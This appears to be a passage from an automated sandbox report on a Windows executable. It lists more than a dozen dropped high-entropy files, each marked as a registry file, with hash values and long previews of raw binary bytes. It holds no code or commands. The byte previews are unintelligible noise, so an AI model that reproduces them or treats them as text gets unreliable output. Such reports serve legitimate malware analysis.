              Encrypted:false
              SSDEEP:192:ZquvLYG2PyppfhxE3EKbOfdxEtDpQgf5e4JK+TbZP:f2P4fhxE1Ofdx0DWgnJK+xP
              MD5:EFFD98D3B4E3BB143D9649119681DE32
              SHA1:EE615AD10A88B0A4644865CEFA7B7AB06C97537E
              SHA-256:A9688B839DE2646E1B9389727B4B7F3E7BA90CF2C544C7D695085D91FE96E436
              SHA-512:9A29F1EF1ABA99E38A5B13A14DB332F6EB6656F508C1FDF45C79C0DBEE901055221C510B07633080DD41D808338D1BB487F908F3CA10E892D96BC750CF26B51E
              Malicious:false
              Preview:regf...q....>+H...B.\.....p......7'5.\...49..g.......6...^.#..mNL3..N"UK.+..`..6.L>$...8F.lt...`w8I,qO............+..CR~..R.t..'....U.W.7.F1i....Y.../..6...".R.f..........a.lbc....30...<#.y"..Q.JS...Ss3.X..7.......y'tV...G...?..9.....d3vH...X....<..^d...}|E*..t....1.....J).<.V...+..1A*.YmH.X.$%z.7.P...{...t.....Uh.+..;T.d..S....`Q.b.$n_.}zde=...Yc.Q...~L.(.....Yd..@Z........A.;....c.....[..^X`.$....[..e.. s......yl.B.H`.?g.&.*9...W..O....>.ma..m......4.R.8.i.Y.....uzu..z!qt{............EK..T..]..X.....6j.;.J./@.n9..p.o..2.LJ..T.+....'.]..5...J-Oz.....#...p@.}M.`8]......B'..X.......k....o...H....3.4.$.....J;..'m..P.z.lS.O...=>.b.,;(.8.~*..?=...X...&..-F..iq.$.|=.b.~..q...h.8....k5......t4..)..f....#.Mj.W.T...=W=<B...2y..{.a.8..'..pN.a[.-d'b...Lf]......c..a?........z........e.;..k..,O...Dd..y2.&t(.B...p{`..Ey[xFR.R.....B..<...WGYs.....S.....0D...2\=....\.KT~|.4..X...k....}..A.D..K.$.3.S.....?...J..l;.--..."f....2G"..K.x.<m..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977273554699072
              Encrypted:false
              SSDEEP:192:yAphQX36duGqPd2+ri4pdJ65QkOob9DEXH7B1fQ4Z4+QWCu:yApq/dB2rUob+XHPI4Zx
              MD5:854E41C1095B2BD84813789F9ABDF140
              SHA1:DF7DDECF9189FF90CF819352A7BCFEDF7E7FD7EE
              SHA-256:A4EA07AA19D9AC9DB00FC55E0C30A96C32BC02486294FF1F636F70366412F4ED
              SHA-512:CCAFBE22EF5467DCA23DC4ECD61A77D991AB16C63B263D793BEA5AB0FC6536AA8469943E609C88DA0C4D874FD2D01B771A45D3A1B127100B74242EF1AFBF0648
              Malicious:false
              Preview:regf.......z.#..U..R.\..f>.....,H..zS....Z...O...ABr.K}.Q..Eu{.-_..+....1.....0!.1Ha.pA..8y...&.."t.y&..yK.#.A....;r4i...7<p....D....O.[.Q:D..S.B.f..(.KJ..>N.;f9..C.....=.=..p......F.....z....|...cH(..}....R..._.....}.OS?.....i...e.....B...\....J.!.b.rx'.9.XOH.i..fNG...v:].*..W.....B..U.....h...^....Te.|.L....j~fq..l.D...=.?...Q.Y1".......'@L.....%.f.m.......y|s....$.'~B..^?..C8.k.3. ...K.K......7....X...H..Qf........2..YM.}`<.e..1.....D...5..(.a...(q.u.M.Ka.r........Z...:..F|F^.....r..C..y=QWPj.=.V.Z..5U.8..rJ7.c.UI.NR+.G...0.!..:.UJ^jL.i..Qv<.........%.&..~.....1...*w.).v...:..8...B.l?..b.a[..5d..|Xu$..B\Wzh6..O=R..(]E.G..k..u.A.\~?\r.U.Qx..^ .r'..>R?....r......O....W.......>..n..^G._A..<eE....!u.l.sf......`.vk........\....`....3V.z,.x6[$.}...9...+-..M[..i..o...L.Z.>.k..C...V\...l..G.g+..Ta...hD:.KY.f!..;G........=,.j.s..h.9..L..7.....v.i....j..&:_.?y]|...[2.'..,.Z..@.....Wo$.f....{..JZk....s.@T..B.r.Yw.......5?.i.4.....U..9...6.vX....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.98004556965813
              Encrypted:false
              SSDEEP:96:LLheYUCHM4wK4jkjhtKL0c79YIli++gW6g9AJIS5M5OmEjaeRJkcYGdr1g5zt5rR:LgYUCKKu0E9YuigOMG5O5ZYbFl63m
              MD5:1BAD8592DF11B0B3CB3C8BE26C1F06D3
              SHA1:1804E97400DAF3DB3B55EE43833725706C730137
              SHA-256:B03946421CE2C22902125F9B9918EE51B98FDBDB03B587752F52E56597373EF6
              SHA-512:13BE45566E764754CF2C937791A0F5093810C2985E1F63B87A8E0184E82692A3A176D527D54A6C01BA6903FB381665DF4B1B50121993258D3AB3230241241EAC
              Malicious:false
              Preview:regf.\T.A,.....^c..M...{/.......1n...by...?.=.eR...n1.S(.}Q.0.T..K....J.uE.\Q <.....M%...6*......0....$R....^Q.|..-....{4L.....[.b.m..4.}".".xR.|.Nj(.;V.1?f..C.-....5...%........t.......&s.W..o.w.h,.j.93d.)...b..&6..l.y.<...}...;......S..[....3_/.]m4<Ug..gy.1.L.7...n+..|...KE..%.......;R.......{....3."."!l.}.4-2..0..X6..OA..s.K....,H.x.:.C.)d....J...~}..9.M%.B.Tn..G.. .'.+.J.....J.\$..S.L.v...u....=.x.C....V..t...:9.st.5z.....<.;./]9J.Z.B$V.]L...<!+..........2.;.....%QD...n..u.......}....ub...Xj9.s...9..*..)...C.>...GwSz...."Cg..L._..j)o..!+..R...A.:Q@I..... ....r...#.p.x.s...Q,.[...DL....yS..w."..P|)g......$..."..*...kgm...`......Tj.......H-.......#......'.J...D.....b...kR..o?.R..!...{..E..!...........4R.*.....p..'].....G.....w={..._.IL....y.Es."P....j..}D.i~............d.8.:.D.>X.......u;6.X...C.u.B..(/...Z.[.R&... [M....l....<7.....p..e..VN1.u..3&./.-..qE....&U.(...._....I...2..).....,(Cg....z...S.../v].8....)B..Oxo.....W..._Xg'.c
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979796602136733
              Encrypted:false
              SSDEEP:192:/XxwegroL601yTjZ+Rz/5frUKmEsxwgP7qmDQHFJ2nDLO/CkZdw2yfqTi:/mpkLVkZ+Rm7NklJ2kCIju
              MD5:03E7C942D75D9FB9F8C8F6F512BC803A
              SHA1:218C59489766B2452B9C0EBA453C77FC44B0303B
              SHA-256:F04C151773329D07E24328946A2B3F6CB58715F416939D0EC7DA2DA8738ECD92
              SHA-512:58944918482B987B1441336F245200C027F9CF680D5A17B80EA0EA3DFCE6F4D22FA39FC8B6A9E83AB316C75E48EAC6A42AD96942B97826C90A812BAC8E9BE62D
              Malicious:false
              Preview:regf...V-........-r.m.-[......&=.L..H..w|...T."3..S.C.....R.Z..j.O..X...eKw..m..(.....>=v....n\k$..h....K).x..{b...,..9.|.aX,...9..Ut..i./?....h..U...b...<..+!.....o... p..`..K........r...N.B..-......N?...gO..un..Jf.t.... ...%l....4..ggHP'....*Q..1.W.xz.e..a.U.S...._t.s..Q.....z.&.,`. ..K......U...._...&.O....@..g..FA_....w..#.C..U.H.....MO.;"..&;.....$....UB.1..]$Ca^..Dp.}F.{/.....q.`d.7.V....];..U/V.IbO.V....c..<.j...._.S...N.....$.Z..y..6..H.'..C..qm..Ws .....8x...:.&E5q.....Y...U.}@...mv..q.s=.. #.\.........x.{.\.s%.?l.o..4.s..../.+....Y..J1..c5....o.*.....-..U..j..2..e.2Zw.I.>}....Xk....H..y*..R..G..-...)..&`.J.5k..a..]V;y.l..?....O.J.Cy.$....rl...R.c...r....%.s.O...NH)......YL..........#.L.9i#........E....._g>S....##..yJBb...]Jx%}".=.T.MK...h.|......b&..QZ.>.&...'....^..)f..k.e./.l(...4.6..i~3S........q..p.e..<..v%.........!.D.o.M...m.?.yz.....d\..B..0..y,....).;-.&....}%..S{...#qh7............i@.X...g... 1_((.CR.j.....7..54.[.daY{..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977641968946028
              Encrypted:false
              SSDEEP:192:jtxc+bHzXlfYZknFwTEzx4PB0H+ITIBeHk2sa6ry970G:Xc+bT1fFwwYB0VTow1GG
              MD5:ECB9D035584348C2C0A3BBAE7F725DD5
              SHA1:4A2DAA7CC58476E9AF17E21D3C11B29BE7D58CCD
              SHA-256:C4CA320A088E1846EB22CDB6F672116586DD63B307F7FFB95BF3FC00012BE135
              SHA-512:A0856FEBDDA0722EE536EF90B2EC2BDA71D55D55243A5F6CA2E2D6B550EF693C1B0DD95F756AB83B3479170908505CA8E984B6C7E40D1F12104ADD286BD30969
              Malicious:false
              Preview:regf.=5......l.5.5.[......-[......N...Bp..#y{...........@..x.R..C.....*...-<.. a5W0.....r.;..b..V.._j......\...s.hAf...-.r~c.pm.h.B.b...... [u.E...r..x..K.../.....!..OZ.....iy/k.I.@..5D~......_.m\....u..5..B..N.I...;..F.';.....7.,k.O.3w.#~..y....*...m..1 b..ZX.V.......@.....[R;Q....t. .......xCuH*.Y..k.4;n.nM+.2.Z....PFH....uB...N.kx.y...gXX.s..&A.w2\.,.jb....C......H....kd......h...O.<,kw6.g...tX..5.).T....I......1...BX.........W....6..(..26...Z.S.+..v..!.....<F........f.>.....1.|.P...C6.b..b....8.x.3......g...7N.>..#8p%.4wRYE..i..L....Sx/.['3.t.u.f...@.q........;."..a......c.V\.o.v..0..k..,qdN..@.j9......|.y.3Z..Sh(....>..'7.x.......[....l.{..[q%......e.ws0P..!|.{H.g.[..>B..I.L|<.i.5=i..3.'..(./o.....F.i....<..Db.iDC..W.A....C. ..F..$Jd......Db...>.Kp...XN.!{..\-.}/.....n..y<.8V......~.i..x....:bh.Y..u..4.I.B[....a.....v;WMg~...s..>..>.*SJ.f........1..|.l..i?C......ts.....4hT.X?a[.vN........%.../...40..g...~.0....{.....Q7.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979291869908251
              Encrypted:false
              SSDEEP:192:O+cn9gOoJTVwB0sPaInNOBfGkIlKaCueWfwskZyc7FfaGCf0w2bcxL116:O+c9wiBTlnSfbI6nfsCCDGW1U
              MD5:312B3ECF3F1D34F2612D3A63FF8D56E2
              SHA1:FDD105833E5D97527A8D910CECB0D20E14F829DA
              SHA-256:10EFBAF1341BE56CF83FFC97FAA45C51B6268B43945EDFA95F67660D02148F76
              SHA-512:893BE9ED3847B250102FFDB8D13D1FAEC3DB96D305916A93A048E03AA1D88E651FF9C35152272D98F94A325D316A8EA49DE9746DC39E5DFFDF94DAA05F4CB6CD
              Malicious:false
              Preview:regf.....sH...<...YeG..1...HoC...._ ......u.3..m.S.4f.C.]<vM...\.Jy.).7.........#.....U!. S...0W1t.I..1..FR.g.......|.p...r..R.........Z....+Mx..?.w..Of.0..xq.&F..U2......cgO.I....d....B~..._.%..$..u.KjDc!W..wl.x+@.|.G..7jE...........,....!j..r....1..AQW.]KB._..J:"="G..|.2z....A>..u.yD.HS..!...q..fYcv....w..bv.........'........Z..I.2...?..E.#q..BA.1k..DR..X....A..^f...#../.M.wj..`...b...z..v..F.9'..g..@0...}T.....w^.Y...t.../.a.-EU..q...Q&f.W4.....y....6..3.Z.>...Xm.B.."..^............"..oTaC,......c...K...9..$.V...]..x.q..^.3q>y.v@.5.%!.@r.\.....k.....Ec.UN..z.DL.&.....?..O.s.eom...g..o@1...F.J7......u...........8.)..~xX...]".2..|.*..3.A..,.3....g..e...V &.0.^.j.lI..!..g.@r.2@.4.1..g. (..D.C..l.L..{.%.a.g...?.W......"..2+qu}..3w.)..6".;...]d....j.].%]/.y...W.,.K.^..I..k.W.s......u..X~.ps....PV.&5.b]k.03..H3...Q?.kP='?..%]L.n_E.I...MT..^.m_.U..Ue.....-++.&..}.^z...#.X....;.B.K........4..pD...N..v..=....Zx..]....V...I.....`..P....F:W.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976899186523231
              Encrypted:false
              SSDEEP:192:bASFD/nLCE6dKXczIWKUYxrznBWRFrtk6JYPf9Jkj/rG61zzM25w6Nc:EiDn+dzz3Yx3nBWRFrtkzojjvk6Nc
              MD5:CD234DD05A8147AB94291A498033E825
              SHA1:3A5C2C4CD856331E9C51FBC5CA759B8A47B10A27
              SHA-256:EDD4F1EE67D2ED88B297A1F0BAD5BB188D78A56B73C31ACB3D49A8FDFF8F2EF5
              SHA-512:619C08BB01680475E524E01634FFF6921D860D82728611A83F66E0C1F49F9F1F09BA41EAB38731E5BB38A1A1BD0C55D6948133753FF9C338D206895FA7573492
              Malicious:false
              Preview:regf...q ..f.3......|nz...^..S.$.^EsE.....[NW.c......`.1...&B...H.?...l.m.6...]'......H(cr..6X;.t.s.l.....h.o..o.t.nS.r.}}...... ...Dy..Q......k.$..P..w`..l`.....5B.....&......Dnv..J....[.a...L3#..ExR.e.]..y}"...#.DC...-|.D.$.y...."r=.........!aaw..gpV.x'.k..$..h{.&...`..6.&...._Z.=.54&.4.#Q..P..[g...m...z.+..dko......2....w......v5vGJ.Z$x....t.(_.L.hX.<`Y.Ha)..h.#.21..6Y.W4@..D.%|~o.6(.!..k-....],`..TD.VDd.....<5g.g._.C...t.f@'..u..b.Z).d...B..|.......~.-...&..t..h..7.Vm$.*P.....-..V......J.|2g..Q.S.....\....6..\.P...q.._...b..E]A..Io...]"}..(.E...lY.D...d..6z;......q....w..H.R.8+..8..dB'...L.-....../.,....o.C.P.5.w.ln...(=...I*..K...H..{.t....1...~$|..Q..AS.+Q....[c..K).......2.k.S....@.b{...g.\(...:.Jv.}..].-..QT...Iy......J~........*...A..A7p...N..K.U8.d..c....!..w.`...D..h#.N. '..._".f.u.l!|.v...N...m.P..q,.'...^6... C.......0...l.t.mdnA.}...3.V/.z.q.C..>a....._....IV.i..:..O.Is.......>...[..u_...7C..lK.@.\'T.%.d7<.=.K.bB....(.\.#".=..#...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979836464138886
              Encrypted:false
              SSDEEP:192:7d/VzIxEl+R2UXt7GwImLwyHUj/WGT/KdyUPqip2R+D3GSkeEG7DFxnq2JJa8:5tzMayrXZGlmvHUfbytUk3G/eEG7fq2h
              MD5:161565B1F76C1327A65E5D77FD8B846C
              SHA1:CFEDC03F1ACE0A98AE7FB0D0D1A79D46CB999E78
              SHA-256:936831A0F2889359EDB505C92A77D6CAF4AF7CF8546DB4EE9BAC9E3775AA06E2
              SHA-512:17B66D025A69098F7C1C62A97E5988BC25E156FE7E14D1112DB2BBC7D65B72185F013A14E310552C7CD8B89C6E98793C86225453088266EDB7C5F360889149AC
              Malicious:false
              Preview:regf.S.......Ek.;..."?.IY5....Oc]jQdBea...2.....\.p...T:p]V.O..LC......p!C.(..(..O.{...">.<'.MkC..W`.<0.?...Jd!F<.5...R..<B....:!j.'..$n..L#..,.rG..<+R.......I........x....Q..`#5.K.FQ...[k".@@..p...E<..Rk.G.........t}......o.../]%....C...c..8.X....o%JG...$...-.E..Q.5...M..l./......%......K..]!.......5P}..V...SK1............/.z..}.h..U.p.R.]._.X.....!..f0.%...`..ME../=s9.zH.5!;.Ln.....1J.{6....x..Z...44.}r...`.3..Fo>....Y.F].1......f....3.y.T*...o.oG../.+..(iG+..]...8...]...K...!6....'.|MF.Ig+k...K!.V.._..f..H.G....g0.e.r.s...eW.~=.>...>. .]Q..<.aN.4....}.X..~..:....cC$`....4o.5.u.t...b..~.v......~r..p. ....3.H....l...r....Z.t...9..D.MH...{.N.Pc.....S.w.....J........#..HI[f.H`VD^...u...e..0...j..^OZ.oi...9L...0...........1..t..g......0..d..n..I\p*.9.k....G..,......e~.q..#v~)[T...;.........!..Gk|...mHV|..1.|..i....nZ.q:e...X?.b-....[E#.C3S.{.S......x.....TPx..,z2...K..{....?.^..%qs,....z...&/ph..6..!.S.V.a...U.....zFg...I.%3....O
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974961138126521
              Encrypted:false
              SSDEEP:192:dl7j4RMwZarVFmEmLeaRVRARTeYKrGN3hEERcxWIc+ATi/qu:8RHZarVF4eyVReeYBixWIcoqu
              MD5:AB45BC4854EAFDCC752F231A636F4616
              SHA1:7CCA60FE13278E965B463A49CCDB9FC85212BEC1
              SHA-256:E02EFCD79530328D1421AD3869583CBC84D99DE468224277AB678964542B1698
              SHA-512:5B42094806D47C630529383D1F0A3E27C86C58460B54A1B62AD07E9E08C43D8C48D2083D72030AF43189FDCE3B57B1C1E6BB4E8F0BA48419F5F5B23FC859D42B
              Malicious:false
              Preview:regf.F...N..)UI..A...D.a.>...#..|..A.?7^E.e...[....].j..*....Y.oZo|3..{w:%\....[.l..&.C..g.G.........X..%.m,.z4...%(...;>n......6..X.<...E.'..=$o.....`...y>5........K....!k}.sS.1.....D..v.=.Y......-..`...%.....m=g...[...XR..3..D..}..JHC.s.>.-F4...LC3...8R;R...ta..l.F....FX...@.SL...y..j.."...h..X..... .s..=6.l..i.Q~iS2..m..r.p.x:..i..Q.0.......9...Oj..C....s.%.e..F....o&..-........mj..........P.x]av.."va..D.u..TP...Ou.Le.&..pGi.L..dx..Q....5.d.5P.R.u...C..F..N%."..x..*...@..C.&.2"...r.'......u.23U:...,..l.x&.....`.#....T.w...k&......U....*X.......f......{..-..}u&y6..W.....U!.T.F.B...q...{A.~M.. /D.{`.....)\i.ceI...)H.....5FCa.....P[..`'.........p0'..{....J.9.?....$...Bu.....b.....=...Q.Y.`.kl.......;mu.....-..j...&SRE..^.W.&.'.m../.K.Y.C.mO.....^.9.e..bj2Y.;.2.=...U.xr?..........gb.A.Y.........:..?.t..k.C..t=..J.x.....7.W#..Teg.9.cm.vCa.}..M...........4.\.a....fuhk0......._.:....oKO.}.v.*7.sH.BS.1.BA...E.U..).!...A.{GkL.SWo.&...2e,..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977026868920903
              Encrypted:false
              SSDEEP:192:wbpSLONZOhOcuapBsALhMiK/kXoxWE8hROu0puhcyzAE5tfd9B:KbNUEcuapBZLhMiK/SoxWZQu0puCyFxX
              MD5:4610213B7C336D93ACBBF80A663F94B1
              SHA1:4AE84E838A74306F4B31CD6C757B98982077BAA9
              SHA-256:13299AE5427AD14EF78A9AEB6E4D636C17D7F93B4F348D27FDAC6BEA34EA9E76
              SHA-512:9FAAE30C304550D58FD330F14245F93F40CED2689AE958C48A700740136064FB473C48CE47A32B2E5226BED80ADCDB4169AAC5B942C10567CE306452E2682574
              Malicious:false
              Preview:regf.!Q~.w'....S..G..E..!I...W.......Sx>.KO!.v.:o.M&./.R..'t...K~...#.K/ ..c...3.:6.....N"G...rf...D..,.R.B.3J9..DKAV9...nc).<..v..............d...x.#U..b4.(r..0.&N[.3...!.=U.h.p\.4RMw.r..).k..@'..L9................0 \.m./w3.%.n.N........c..>b...l?x.~&}w..<q.$.<..;..h..z~...vYU0.:}."......7...".7...M...Jx............%.....?.<h[9wp3...)...a.r;.....M.{q...\.....>.../F..K..o"{..*....+q.d.,u=l..{...0..Y..%..v\.12.!..0..z<..0I......V.......-h-..*t..Q......q..."..N..Ho.h...I.i.l*3....p.._.$...tc......2#.k."^p...w=_....!d0...^.c...zUa.=e...&D.Rh...!.Gh.*...........U..Yx..%ln....mA.5...........Qu..h@=.`5..p.)....~.$n..$....v`[e.....K..*....M"..[.....R.....u..z.}..i0i..d..ghL.>.6.#.....g...."..ej.l...%.....DsA.L.OZ.kq..!....).AV....*PK..e.g.}H'....(./1..1..[...j. (8Q..z.......k.,..../8q48.. .0&. ..]...4+.;......)Y....W(..y..r...^D.G...z.f....0.+bn..l.P.S..6..L.]O[...3..jQ.N./.0...g@.......:...U...\.Ws....j.K.:....)..;wz..!.|..?.mo. s(F.T.D..WR
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978556995776738
              Encrypted:false
              SSDEEP:192:PMHRdCJxVQGGZJtK2YqdHslsmzQcqRD2etmEKrlLXPMjrSfREOhe:PqUVQG5256hMcqdt8rlLcS54
              MD5:20ABA2BB9663A23EA6727BC86E6129A1
              SHA1:D5C9FDC76C5AE48EC9972E3309F3F8EB7C7EC076
              SHA-256:3175F394710EAB505679ACC833C2CCBDE4296954DBE5B5C0EAEA1C51F1EDA861
              SHA-512:6127BD79E0D20F7DD65E8888D7BC706CE87D65857609A55B979F21EBDE00DF8E87900F7AF18DF1468FB361118F7BBD418E392ACB4F1BA6218B44831BA8A49345
              Malicious:false
              Preview:regf..,#L..&T3.J._98&.#"!,.ffw*${.=C..<.d..g-.V._t..Wj.*.cu.|S|.(..[.....<*..z.../6.........n......".j.dd...=.../UH..7...>...'h...d.q....R.f...D.^~L<X5>.ux..P..5.a......../.8.....EhmC..=..:..,Q#*/..$.U...roh...C.%f...h.B...D.........L.L...c=.~:..S.,...fp...PE...m`O..!..o.~.6..hk<....&%RF.........8..X..h(.....B.{(.;..:.M.J..._.$.)$...H...H..:_w.Yk...,.....L..-C...^V.)L...._.z>.?\o..]..7b.|y.m...`z.bk..A.i.sz..Zm1..'..g..is....;{$.8.6..{.]gf#..^.....).A..M.Ee..z.hD..=Z>.......9...~Z.y...F`.>.C...3......\$.......PE.b..lei.y..Z..}...#...$..J\'.)..j..n1...A)..i...$_.T.&.I.Z..k6.y.&...|.R.*.=N.1....#=B....%....~..z...,.W"g.......|.n.....H......:..^......c..6^.}..s$..2.er.....|d.XR...~W......>.d.jL.z..I..".....N..5.Ff._.)A..4!.q........d..=...di@.w.....Y...&q.C.....E..n..s.%.>n..9.H..]..HH}F.z.oH1..!i`8.7...)....g...Ju......i....&...3IV...z...Fz,l....y....B.#...tn.3..$X..n.5,q.......J.#DC.s.0w...-.K...>#.V~..z..y.m...!.....e.}>...#.K4E3YV.R.`}..8
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977801837448173
              Encrypted:false
              SSDEEP:192:sX5v0ddFNuPcC/UgFWJgg/KtUkEoF2OuUVUkuoKAj:u5v01kPn1cJg6tQ8U2gj
              MD5:8F6D6818827177626F0EC6B766CD92C7
              SHA1:8BAE5D223674C3DD886FEF3FA45C77BA0D04E16E
              SHA-256:123362455CA975228D124FA671B09306C5A6EC8ADEBCFE5D50D7330D7D283547
              SHA-512:71BCAA0FE06AE114FB28374C9647A1BA0DF3906FE03587D775EC424A3C69F4DDBB24D6D51F30B89B1C6C193D4BFE596A20908256BA023E1BA82784ECE3568C33
              Malicious:false
              Preview:regf..;....Wkf...7_$".]2.b...A....0..r1s."...........,`8DbY..2...[#.E......}5...d..W.J.,*..x.1......M..V......`@o.L.O~0...n.R.9..|,.W13ZR3)3...+.......3....k...^.#.(..Z.l..2..S.Bl."...t..!S.L..PQ.k.5.Fd$........tcbl.J.<0T......J..|".u.s.4o2<7..a[;.!...o.V.4(.J.c....Z..zQ.../(.g%.a>..v.{....>=.P}f.....9.d...6_.C..+>=...U...L..-'....4....O4....[....q.+n........!.>.....((.1.5. $.....1Dr.\.....u..{X.'1....;|.....%.]E,A.....@01.o@.v..e.....!....W4..y.iP..|16$q....x.......$.7.......RV.N..u.l..[......uTD..1v~=.y......u.r....xw}......r.|b........}.?km..2.....`.6g.l(....Yt...fui...<....e-............H..^....P>N.=...%`...,\u.]...R/..\.m...z\..z.4.w...I.z)4....!..OG..8..:.N..w..,Hy.T.....h...l.p.)...........9...'.....)2.q.@..2>1.D....W._..M.....5..[.....a:.Q...Y.V....9/[..*..3.K..5.T..6.......n..L.w.&b...x..`..t.Q...C./...h.9.K..]R....wYt...O......x....[S..#m.......ip.^.Gf.U.=.....D..$...tr.'....^.z.:.a.=g.......!F.T}...i....Z.....k..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976513321589257
              Encrypted:false
              SSDEEP:192:zeN5AcaLY/Ai/n/bZfw45tgl7fzUW7uqO9C0NEBBPc:c55wY/Ai//bO4fglTz93BBPc
              MD5:3C2566B4CE5956343413693D3A79391B
              SHA1:B5CDB1A198E9387451AE72DAD1754EAD58CF41DE
              SHA-256:3C801AB4421508821CBA9AD0118EBC386A753891F34A15B6B6C90941E22E4FC5
              SHA-512:B66A3489EA21449C9033757B4E5A12FE1A8432B61834EECDA3A9401DB3EA768FAD4F286C26445FB03B8B0D44BFF07376CFDDA57B430E3E5E8B45CFD9E8F97EC7
              Malicious:false
              Preview:regf...`.q.....s..#.-...:......Z...T.B..q."..N.4Wx...-.FBZK..t....KB......grnR.L.(.I.C...wm.....[..#Mq.h.s..u.....S..`.b,k......l...|..h...#...p.t....".ed.k./...BN.".6Sz.SY."...d2>..|.M7.... .p.....N...Z.c.....9......@..q.by..bP.bt...96....,.....~......2..n...N.....w....,....%...iH.u...*....1.3#2b..e[...S...V.."B...{....UL...|[D}....5..a........\M..0_....l<...CR..~...vi..X.S_..|K~..>M..\.>..Q.L.............l8.n.7......<.C..XQ..&....P#..Y.g.=].M...*.. /..._.fTdS.u.,..Z.S.......s..h.....2._..7..e...t..m.Y.G'.'B.....l....K.:...r.].C%.Y.<..g..-.u......t....D....$.l..@%........E..........r.^e..^&..T....P..Cb(v6P.-.".....0.p...tw.D...t&..J..I....hcn.D.t....R.`....!..g..<&.%..5J.........e.m%..v=g..B......../U.~.~..0...Q...%.....P6nu.&.#9/....Z<..).\g.]V..[.9.7....rA.e...J...3$.nV.).E8D.W..k.d.....EJ.?.....[QR.1...y..6..U.6F+h]-.e......y...T8.xK......P~.0}..............c...z..NA.7#.C...:.e...k-..MO`.e.C.......$98q.F)...*.-.9.o...=n....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9773505516911305
              Encrypted:false
              SSDEEP:192:3wZW25Hhc87Tu7TiE/tA3H1CuD984I+9vkLUK5pHgb:3sW2Fa8+nJulC88U105pHq
              MD5:1FF1967E17FA6EF4D43E4702F86858F2
              SHA1:DE8B1B56E664D3989C8B16FFC1FFD95B7406CB03
              SHA-256:4B7FF45ED7522BBFCF9B774B4DE1BEE2751ECA502A3D77559B080C750C1999DE
              SHA-512:5786B9415049597C2A3BD0F07C97B10ABA3F73A85AFB3BD3C8AD34A9C09CD06AD5B7A35855B438CE4BC603DE735E97E784B46986552A52E36DEFF07AF42949B4
              Malicious:false
              Preview:regf......\..u..D.a.;...I.>....D$.6..+..d...<._.)L..Di...W..1.<..pP...0.:....w..=.)..Z...w..UK.p..$..l..(v..\...-..IBF?..p|.b..N......Zr$.J..e....&i1.....S).KP%...J.M.MW...Y`...........".D.Z..A..iL>7.Z4.H.+.[k...0'..O.8..i{.N......Q.`.WU.)....&...V............cC...w...v...v..8.H:..Cs.~..T...H5e..r..T.<8....z..Sf.GE...^Q...hK..c..Q.[c...s.|..K.{..)..Y.6>.1..FJ*]...w.....3......<S.#@c3.;,$...r..D ......b.=..?..kwg...C...,..uP......[..4.:3..^kFWn13>...r?f._.Rq...R..=..vO.8{.L.$.....cY?..A*....L....... ..N.....E.......M..5..f0...1+..mS...G0\@......50....)/Z.V.y..G...@.k".. ..h.'f..q....u.X.*...h.i.q.?n{M..A-%.4.L..P.lvJ/...w\G..lr.g....Qqp..R...T......c&...r...w.......w.L6i=...;.m.5?~.k......{...Z.R........^....'o...{).."..,.....S..P~...~.g...I.B....-V.......k..V.......3..{WtA..a4ZL.)a21%.U..f.....JhB.[m..L.C...j.......F....[9...V.......@Xds.i.$....%.$.......i.Fy%./kO..n.~~j..q?.`f..........k.....gH....i.D.9.....%.&..................d.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97709555571066
              Encrypted:false
              SSDEEP:192:AIW/GRCQkqAMLwppslbR0FB1J22zP6+fqRl6Bymqw/KM8:9LCRqAML10Oc6+CMT7/t8
              MD5:4AA0555700679EB1C38AB1E3C0AAC665
              SHA1:44DF48AAA1F2C2123351C8EDF90E983425D8F315
              SHA-256:6F4ABA520C58EA46E5D0BCF92521CA492129C670449EEA1ABF9AE5657A10D3D4
              SHA-512:FF660EE1C63ADE6064284E812C47E6D381A625224F11983DF05678420A191BD49B91968592477494D0C98F86A1CEE6AFD2CE83B1A5C98FE74EF0C997DBC01037
              Malicious:false
